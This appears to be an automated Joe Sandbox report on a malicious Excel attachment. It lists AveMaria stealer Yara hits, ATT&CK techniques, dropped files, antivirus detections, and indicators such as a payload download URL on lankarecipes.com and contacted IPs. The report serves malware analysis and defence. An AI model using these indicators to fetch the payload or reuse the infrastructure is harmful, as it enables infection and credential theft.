Source: Yara match	File source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Test3.jpg PID: 5940, type: MEMORY
Source: Yara match	File source: Process Memory Space: Test3.jpg PID: 6852, type: MEMORY
Source: Yara match	File source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.785717468.000000000061D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.785472155.000000000061D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.786517856.0000000000619000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation21	LSASS Driver1	LSASS Driver1	Disable or Modify Tools2	OS Credential Dumping1	File and Directory Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Endpoint Denial of Service1
Default Accounts	Scripting11	DLL Side-Loading1	DLL Side-Loading1	Scripting11	Input Capture121	System Information Discovery16	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution13	Windows Service2	Windows Service2	Obfuscated Files or Information2	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell2	Logon Script (Mac)	Process Injection412	Software Packing23	NTDS	Security Software Discovery111	Distributed Component Object Model	Input Capture121	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Virtualization/Sandbox Evasion4	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol12	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading13	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion4	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection412	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Users2	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Telex06012020.xls	12%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Test3.jpg	100%	Avira	TR/Redcap.ghjpt
C:\Users\user\AppData\Local\Temp\Test1.txt	100%	Avira	TR/Redcap.ghjpt
C:\Users\user\AppData\Local\Temp\Test3.jpg	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Test1.txt	100%	Joe Sandbox ML
C:\Program Files\Microsoft DN1\sqlmap.dll	22%	Metadefender		Browse
C:\Program Files\Microsoft DN1\sqlmap.dll	41%	ReversingLabs	Win64.Trojan.RDPWrap

Unpacked PE Files

Source	Detection	Scanner	Label	Download
19.1.Test3.jpg.400000.0.unpack	100%	Avira	TR/Redcap.ghjpt	Download File
18.2.Test3.jpg.2ae0000.1.unpack	100%	Avira	TR/Redcap.ghjpt	Download File
19.0.Test3.jpg.400000.0.unpack	100%	Avira	TR/Redcap.ghjpt	Download File
22.2.cmd.exe.5250000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
18.0.Test3.jpg.400000.0.unpack	100%	Avira	TR/Redcap.ghjpt	Download File
18.2.Test3.jpg.400000.0.unpack	100%	Avira	TR/Redcap.ghjpt	Download File
19.2.Test3.jpg.400000.0.unpack	100%	Avira	TR/Redcap.ghjpt	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
http://lankarecipes.com/mages.jpg	0%	Avira URL Cloud	safe
http://lankarecipes.com/mages.jp	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
http://stascorp.comDVarFileInfo$	0%	Avira URL Cloud	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe
https://ncus-000.contentsync.	0%	URL Reputation	safe
https://ncus-000.contentsync.	0%	URL Reputation	safe
https://ncus-000.contentsync.	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
lankarecipes.com	192.185.236.165	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://lankarecipes.com/mages.jpg	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://login.microsoftonline.com/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://shell.suite.office.com:1443	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://autodiscover-s.outlook.com/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://cdn.entity.	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://wus2-000.contentsync.	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://powerlift.acompli.net	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://cortana.ai	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://api.aadrm.com/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://api.microsoftstream.com/api/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://cr.office.com	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
http://lankarecipes.com/mages.jp	PowerShell_transcript.179605.1KVzgujm.20210108093427.txt.3.dr	true	Avira URL Cloud: safe	unknown
https://portal.office.com/account/?ref=ClientMeControl	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000015.00000002.877459698.0000000004FD1000.00000004.00000001.sdmp	false		high
https://ecs.office.com/config/v2/Office	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://graph.ppe.windows.net	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://officeci.azurewebsites.net/api/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://store.office.cn/addinstemplate	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	false		high
https://wus2-000.pagecontentsync.	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://go.micro	powershell.exe, 00000003.00000003.731177309.0000000004F95000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://globaldisco.crm.dynamics.com	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://store.officeppe.com/addinstemplate	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev0-api.acompli.net/autodetect	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.odwebp.svc.ms	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://web.microsoftstream.com/video/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://graph.windows.net	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://dataservice.o365filtering.com/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://stascorp.comDVarFileInfo$	Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp, sqlmap.dll.19.dr	false	Avira URL Cloud: safe	low
https://outlook.office365.com/autodiscover/autodiscover.json	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp	false		high
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
http://weather.service.msn.com/data.aspx	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://apis.live.net/v5.0/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/syohex/java-simple-mine-sweeperC:	Test3.jpg, 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, Test3.jpg, 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp	false		high
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://management.azure.com	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://incidents.diagnostics.office.com	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://api.office.net	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://incidents.diagnosticssdf.office.com	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://entitlement.diagnostics.office.com	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://outlook.office.com/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://templatelogging.office.com/client/log	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://outlook.office365.com/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://webshell.suite.office.com	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://management.azure.com/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://ncus-000.contentsync.	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://login.windows.net/common/oauth2/authorize	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://graph.windows.net/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://devnull.onenote.com	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://messaging.office.com/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://contentstorage.omex.office.net/addinclassifier/officeentities	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://augloop.office.com/v2	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false		high
https://skyapi.live.net/Activity/	1C667E71-DE7F-40D0-8C7D-A76533AF53EA.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.185.236.165	unknown	United States		46606	UNIFIEDLAYER-AS-1US	true
37.46.150.86	unknown	Moldova Republic of		8758	IWAYCH	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	337287
Start date:	08.01.2021
Start time:	09:32:31
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Telex06012020.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	3
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winXLS@25/31@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 38.9% (good quality ratio 11.2%) Quality average: 20.5% Quality standard deviation: 34.4%
HCA Information:	Successful, ratio: 87% Number of executed functions: 186 Number of non-executed functions: 32
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.12.23, 52.109.8.24, 104.43.193.48, 51.11.168.160, 92.122.213.247, 92.122.213.194, 2.20.142.209, 2.20.142.210, 52.155.217.156, 13.64.90.137, 20.54.26.129, 52.255.188.83 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:34:46	API Interceptor	49x Sleep call for process: powershell.exe modified
09:35:06	API Interceptor	1x Sleep call for process: WMIC.exe modified
09:35:19	API Interceptor	591x Sleep call for process: cmd.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
IWAYCH	ul9kpUwYel.xls	Get hash	malicious	Browse	37.46.150.139
	spetsifikatsiya.xls	Get hash	malicious	Browse	37.46.150.139
	Payment Documents.xls	Get hash	malicious	Browse	37.46.150.139
	Payment Documents.xls	Get hash	malicious	Browse	37.46.150.139
	spetsifikatsiya.xls	Get hash	malicious	Browse	37.46.150.139
	1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls	Get hash	malicious	Browse	37.46.150.139
	spetsifikatsiya.xls	Get hash	malicious	Browse	37.46.150.139
	New Avinode Plans and Prices 2021.xls	Get hash	malicious	Browse	37.46.150.139
